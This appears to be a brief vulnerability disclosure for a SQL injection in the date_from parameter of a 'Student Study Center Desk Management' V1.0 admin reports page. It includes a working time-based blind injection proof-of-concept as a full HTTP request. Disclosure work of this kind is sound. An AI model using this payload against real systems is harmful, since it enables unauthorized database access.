admin#date_from has sql injection vulnerability

发表于 分类于

Vulnerability Product:Student Study Center Desk Management
Vulnerability version: V1.0
Vulnerability type:sql injection
Vulnerability Details:
admin#date_from has sql injection

Vulnerability location admin\reports\index.php

parameter data_from is spliced into sql without filtering to cause sql injection

image-20230317091752173

image-20230317092237309

image-20230317092002302

Vulnerability recurrence

poc

1
2
3
4
5
6
7
8
9
10
GET http://192.168.137.1/admin/?page=reports&date_from=2023-02-17'and(select*from(select+sleep(2))a/**/union/**/select+1)='&date_to=2023-03-17 HTTP/1.1
Host: 192.168.137.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.137.1/admin/?page=reports
Cookie: PHPSESSID=ddbatc4qohb6kh1c82fm68ak3l
Upgrade-Insecure-Requests: 1

sql

image-20230317093310575